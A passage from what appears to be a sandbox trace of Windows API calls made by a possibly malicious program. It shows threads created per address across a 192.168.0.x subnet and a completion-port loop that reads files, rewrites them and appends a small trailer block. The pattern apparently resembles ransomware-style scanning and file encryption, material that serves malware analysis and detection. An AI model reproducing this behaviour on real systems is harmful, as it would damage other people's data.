lpStartAddress=0xca70dd, lpParameter=0x5e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x414 [0169.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x5f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x418 [0169.730] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x41c [0169.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x420 [0169.732] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x424 [0169.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x428 [0169.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0169.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x430 [0169.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x434 [0169.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0169.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x43c [0169.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x440 [0169.739] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x444 [0169.739] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x448 [0169.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x44c [0169.741] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x450 [0169.741] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x454 [0169.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x6f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x458 [0169.743] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x45c [0169.744] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7100a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x460 [0169.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7200a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x50c [0169.773] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7300a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x510 [0169.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7400a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x514 [0169.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7500a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x518 [0169.776] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7600a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0169.776] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7700a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x520 [0169.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7800a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x524 [0169.778] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7900a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x528 [0169.779] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7a00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x52c [0169.780] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7b00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x530 [0169.781] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7c00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x534 [0169.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7d00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x538 [0169.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7e00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0169.783] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x7f00a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x540 [0169.784] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca70dd, lpParameter=0x8000a8c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x544 [0169.785] WaitForMultipleObjects (nCount=0x40, lpHandles=0xcb1048*=0x13c, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x5e0 Thread: id = 81 os_tid = 0xba8 Thread: id = 82 os_tid = 0xbe8 Thread: id = 115 os_tid = 0xb10 [0148.849] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0155.987] CloseHandle (hObject=0x1c8) returned 1 [0156.017] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x37e0020) returned 1 [0156.019] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.288] ReadFile (in: hFile=0x1a4, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x2690020) returned 1 [0156.288] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.288] ReadFile (in: hFile=0x1a0, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3480020) returned 1 [0156.289] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.289] ReadFile (in: hFile=0x1d0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x35a0020) returned 1 [0156.289] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.289] ReadFile (in: hFile=0x1c0, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x36c0020) returned 1 [0156.290] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.290] ReadFile (in: hFile=0x19c, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x37e0020) returned 1 [0156.290] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.290] ReadFile (in: hFile=0x1a8, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3900020) returned 1 [0156.290] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.291] WriteFile (in: hFile=0x1a4, lpBuffer=0x2690124, nNumberOfBytesToWrite=0xfcc9, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020) returned 0x0 [0156.318] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.318] WriteFile (in: hFile=0x1d0, lpBuffer=0x35a0124*, nNumberOfBytesToWrite=0xe013, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x35a0020) returned 1 [0156.323] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.324] WriteFile (in: hFile=0x19c, lpBuffer=0x37e0124*, nNumberOfBytesToWrite=0x58e8, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x37e0020) returned 1 [0156.330] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.330] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0156.330] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.330] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0156.330] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.330] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0156.330] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.330] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0156.330] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.330] ReadFile (in: hFile=0x19c, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x37e0020) returned 0x0 [0156.330] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.330] WriteFile (in: hFile=0x1a4, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020) returned 1 [0156.348] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.349] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0156.349] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.349] ReadFile (in: hFile=0x1a8, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3900020) returned 0x0 [0156.349] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.349] ReadFile (in: hFile=0x1f0, lpBuffer=0x3a20124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3a20020) returned 0x0 [0156.349] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.349] CloseHandle (hObject=0x1a4) returned 1 [0156.357] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0156.359] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.359] WriteFile (in: hFile=0x1a8, lpBuffer=0x3900094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3900020 | out: lpBuffer=0x3900094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3900020) returned 1 [0156.376] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.377] CloseHandle (hObject=0x19c) returned 1 [0156.428] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x37e0020) returned 1 [0156.431] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.482] ReadFile (in: hFile=0x1d0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x710020) returned 1 [0156.482] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.482] WriteFile (in: hFile=0x1d0, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x6056, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0156.489] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.489] ReadFile (in: hFile=0x1d0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x710020) returned 0x0 [0156.489] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.489] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0156.489] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.489] WriteFile (in: hFile=0x1d0, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0156.507] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.507] ReadFile (in: hFile=0x1b8, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x2b70020) returned 1 [0156.508] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.508] CloseHandle (hObject=0x1d0) returned 1 [0156.515] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0156.516] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.634] WriteFile (in: hFile=0x1d0, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0xa7a5, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3480020) returned 1 [0156.645] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.645] ReadFile (in: hFile=0x1d0, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3480020) returned 0x0 [0156.645] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.645] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0156.645] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.645] WriteFile (in: hFile=0x1d0, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3480020) returned 1 [0156.669] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.669] CloseHandle (hObject=0x1d0) returned 1 [0156.677] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0156.679] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.779] ReadFile (in: hFile=0x1a8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x710020) returned 1 [0156.779] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.779] ReadFile (in: hFile=0x1d0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x2b70020) returned 1 [0156.780] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.960] WriteFile (in: hFile=0x1a8, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x3e66, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0156.960] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, 